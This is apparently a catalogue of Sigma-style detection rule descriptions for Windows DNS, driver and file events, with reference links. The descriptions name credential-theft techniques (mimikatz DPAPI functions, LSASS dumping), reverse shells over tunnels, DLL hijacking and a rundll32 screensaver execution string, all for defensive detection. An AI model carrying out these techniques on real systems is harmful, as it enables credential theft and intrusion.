Cloudflared Tunnels Related DNS Requests Detects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, Internal Research
DNS Query To Devtunnels Domain Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2, https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security, https://cydefops.com/devtunnels-unleashed
DNS Query To AzureWebsites.NET By Non-Browser Process Detects a DNS query by a non-browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/, https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/
DNS Server Discovery Via LDAP Query Detects DNS server discovery via LDAP query requests from uncommon applications https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04
DNS HybridConnectionManager Service Bus Detects Azure Hybrid Connection Manager services querying the Azure service bus service https://twitter.com/Cyb3rWard0g/status/1381642789369286662
Suspicious Cobalt Strike DNS Beaconing - Sysmon Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
DNS Query To MEGA Hosting Website Detects DNS queries for subdomains related to MEGA sharing website https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
DNS Query Request By QuickAssist.EXE Detects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session. https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/, https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/, https://x.com/cyb3rops/status/1862406110365245506, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist
DNS Query Request To OneLaunch Update Service Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain. https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf, https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/, https://malware.guide/browser-hijacker/remove-onelaunch-virus/
DNS Query Request By Regsvr32.EXE Detects DNS queries initiated by "Regsvr32.exe" https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/, https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
DNS Query To Remote Access Software Domain From Non-Browser App An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution, https://redcanary.com/blog/misbehaving-rats/, https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a, https://blog.sekoia.io/scattered-spider-laying-new-eggs/, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization
Suspicious DNS Query for IP Lookup Service APIs Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non-browser process. https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon, https://twitter.com/neonprimetime/status/1436376497980428318, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
TeamViewer Domain Query By Non-TeamViewer Application Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation) https://www.teamviewer.com/en-us/
DNS Query Tor .Onion Address - Sysmon Detects DNS queries to an ".onion" address related to Tor routing networks https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
DNS Query To Ufile.io Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration https://thedfirreport.com/2021/12/13/diavol-ransomware/
DNS Query To Visual Studio Code Tunnels Domain Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://cydefops.com/vscode-data-exfiltration
Malicious Driver Load Detects loading of known malicious drivers via their hash. https://loldrivers.io/
PUA - System Informer Driver Load Detects driver load of the System Informer tool https://systeminformer.sourceforge.io/, https://github.com/winsiderss/systeminformer
Malicious Driver Load By Name Detects loading of known malicious drivers via the file name of the drivers. https://loldrivers.io/
Driver Load From A Temporary Directory Detects a driver load from a temporary directory Internal Research
PUA - Process Hacker Driver Load Detects driver load of the Process Hacker tool https://processhacker.sourceforge.io/
Vulnerable Driver Load By Name Detects the load of known vulnerable drivers via the file name of the drivers. https://loldrivers.io/
Vulnerable HackSys Extreme Vulnerable Driver Load Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
Vulnerable WinRing0 Driver Load Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation https://github.com/xmrig/xmrig/tree/master/bin/WinRing0, https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/
WinDivert Driver Load Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows https://reqrypt.org/windivert-doc.html, https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
Vulnerable Driver Load Detects loading of known vulnerable drivers via their hash. https://loldrivers.io/
Credential Manager Access By Uncommon Applications Detects suspicious processes, based on name and location, that access the Windows Credential Manager and vault, which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Access To Crypto Currency Wallets By Uncommon Applications Detects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing. Internal Research
Access To Windows Credential History File By Uncommon Applications Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist, https://www.passcape.com/windows_password_recovery_dpapi_credhist
Access To Windows DPAPI Master Keys By Uncommon Applications Detects file access requests to the Windows Data Protection API master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
Access To Potentially Sensitive Sysvol Files By Uncommon Applications Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share. https://github.com/vletoux/pingcastle
Microsoft Teams Sensitive File Access By Uncommon Applications Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process. https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens
File Creation Date Changed to Another Year Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity. https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
Unusual File Modification by dns.exe Detects an unexpected file being modified by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html
Potential PrintNightmare Exploitation Attempt Detects DLL deletions from the Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://github.com/cube0x0/CVE-2021-1675
Backup Files Deleted Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files
EventLog EVTX File Deleted Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence Internal Research
Exchange PowerShell Cmdlet History Deleted Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
Process Deletion of Its Own Executable Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces. https://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion
IIS WebServer Access Logs Deleted Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html
PowerShell Console History Logs Deleted Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence Internal Research
Prefetch File Deleted Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence Internal Research, https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/
TeamViewer Log File Deleted Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md
Tomcat WebServer Logs Deleted Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence Internal Research, https://linuxhint.com/view-tomcat-logs-windows/
File Deleted Via Sysinternals SDelete Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files. https://github.com/OTRF/detection-hackathon-apt29/issues/9, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md
Unusual File Deletion by Dns.exe Detects an unexpected file being deleted by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html
ADS Zone.Identifier Deleted By Uncommon Application Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/, Internal Research
ADSI-Cache File Creation By Uncommon Tool Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool. https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961, https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/, https://github.com/fox-it/LDAPFragger
Advanced IP Scanner - File Event Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/, https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://labs.f-secure.com/blog/prelude-to-ransomware-systembc, https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf, https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer
Suspicious Binary Writes Via AnyDesk Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) https://redcanary.com/blog/misbehaving-rats/
Anydesk Temporary Artefact An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows
Assembly DLL Creation Via AspNetCompiler Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider. Internal Research
BloodHound Collection Files Detects default file names output by the BloodHound collection tool SharpHound https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection
EVTX Created In Uncommon Location Detects the creation of new files with the ".evtx" extension in non-common or non-standard locations. This could indicate tampering with default EVTX locations in order to evade security controls, or simply exfiltration of event logs to search for sensitive information within. Note that backup software and legitimate administrators might perform similar actions during troubleshooting. https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key
Creation Of Non-Existent System DLL Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking. https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992, https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/, https://github.com/Wh04m1001/SysmonEoP, https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/, https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc
New Custom Shim Database Created Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory, https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence, https://liberty-shell.com/sec/2020/02/25/shim-persistence/, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/
Suspicious Screensaver Binary File Creation Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md
Files With System DLL Name In Unsuspected Locations Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations (outside of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production. Internal Research
Files With System Process Name In Unsuspected Locations Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production. Internal Research
Creation Exe for Service with Unquoted Path Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md
Cred Dump Tools Dropped Files Detects the creation of files with well-known filenames (parts of credential dump software or files produced by them) https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
WScript or CScript Dropper - File Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)
Dynamic CSharp Compile Artefact When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile
CSExec Service File Creation Detects default CSExec service filename which indicates CSExec service installation and execution https://github.com/malcomvetter/CSExec
Potential DCOM InternetExplorer.Application DLL Hijack Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
DLL Search Order Hijacking Via Additional Space in Path Detects when an attacker creates a folder structure similar to Windows system folders such as (Windows, Program Files...) but with a space, in order to trick the DLL load search order and perform a "DLL Search Order Hijacking" attack https://twitter.com/cyb3rops/status/1552932770464292864, https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
Potentially Suspicious DMP/HDMP File Creation Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
Potential Persistence Attempt Via ErrorHandler.Cmd Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory, which could be used as a method of persistence. The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/, https://github.com/last-byte/PersistenceSniper
Suspicious ASPX File Drop by Exchange Detects a suspicious file type dropped by an Exchange component in IIS into a suspicious folder https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/, https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html, https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
Suspicious File Drop by Exchange Detects a suspicious file type dropped by an Exchange component in IIS https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/, https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html, https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
GoToAssist Temporary Installation Artefact An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows
HackTool - CrackMapExec File Indicators Detects file creation events with filename patterns used by CrackMapExec. https://github.com/byt3bl33d3r/CrackMapExec/
HackTool - Typical HiveNightmare SAM File Export Detects files written by the different tools that exploit HiveNightmare https://github.com/GossiTheDog/HiveNightmare, https://github.com/FireFart/hivenightmare/, https://github.com/WiredPulse/Invoke-HiveNightmare, https://twitter.com/cube0x0/status/1418920190759378944
HackTool - Dumpert Process Dumper Default File Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory https://github.com/outflanknl/Dumpert, https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
HackTool - Inveigh Execution Artefacts Detects the presence and execution of Inveigh via dropped artefacts https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs, https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs, https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
HackTool - Mimikatz Kirbi File Creation Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc. https://cobalt.io/blog/kerberoast-attack-techniques, https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module. https://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40
HackTool - NPPSpy Hacktool Usage Detects the use of the NPPSpy hacktool, which stores the cleartext passwords of users who log in to a local file https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy, https://twitter.com/0gtweet/status/1465282548494487554
HackTool - Powerup Write Hijack DLL PowerUp's Write Hijack DLL module exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies on the creation of the malicious bat file (debug.bat by default). https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/
HackTool - QuarksPwDump Dump File Detects a dump file written by QuarksPwDump password dumper https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint. https://github.com/Porchetta-Industries/CrackMapExec, https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
HackTool - SafetyKatz Dump Indicator Detects default lsass dump filename generated by SafetyKatz. https://github.com/GhostPack/SafetyKatz, https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63
Potential Initial Access via DLL Search Order Hijacking Detects attempts to create a DLL file in a known desktop application dependencies folder, such as Slack, Teams or OneDrive, by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc, https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0
Installation of TeamViewer Desktop TeamViewer_Desktop.exe is created during installation https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows
Malicious DLL File Dropped in the Teams or OneDrive Folder Detects creation of a malicious DLL file in the location of the OneDrive or Teams applications. Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/
ISO File Created Within Temp Folders Detects the creation of an ISO file in the Outlook temp folder or in the AppData temp folder. Typical of Qakbot TTPs from end-July 2022. https://twitter.com/Sam0x90/status/1552011547974696960, https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image
ISO or Image Mount Indicator in Recent Files Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore, https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/, https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/
GatherNetworkInfo.VBS Reconnaissance Script Output Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
LSASS Process Memory Dump Files Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials. https://www.google.com/search?q=procdump+lsass, https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml, https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/, https://github.com/helpsystems/nanodump, https://github.com/CCob/MirrorDump, https://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35, https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258
LSASS Process Dump Artefact In CrashDumps Folder Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process. https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
WerFault LSASS Process Memory Dump Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials https://github.com/helpsystems/nanodump
Octopus Scanner Malware Detects Octopus Scanner Malware. https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
Adwind RAT / JRAT File Artifact Detects javaw.exe in AppData folder as used by Adwind / JRAT https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
File Creation In Suspicious Directory By Msdt.EXE Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd, https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
Uncommon File Creation By Mysql Daemon Process Detects the creation of files with scripting or executable extensions by the MySQL daemon, which could be an indicator of "User Defined Functions" abuse to download malware. https://asec.ahnlab.com/en/58878/, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/
Suspicious DotNET CLR Usage Log Artifact Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context. https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/, https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml, https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008, https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html
Suspicious File Creation In Uncommon AppData Folder Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well-known directories (Local, Roaming, LocalLow). This could be used to bypass detections that exclude the AppData folder for fear of false positives Internal Research
SCR File Write Event Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example. https://lolbas-project.github.io/lolbas/Libraries/Desk/
Potential Persistence Via Notepad++ Plugins Detects creation of new ".dll" files inside the plugins directory of a Notepad++ installation by a process other than "gup.exe", which could indicate possible persistence https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/
NTDS.DIT Created Detects creation of a file named "ntds.dit" (Active Directory Database) Internal Research
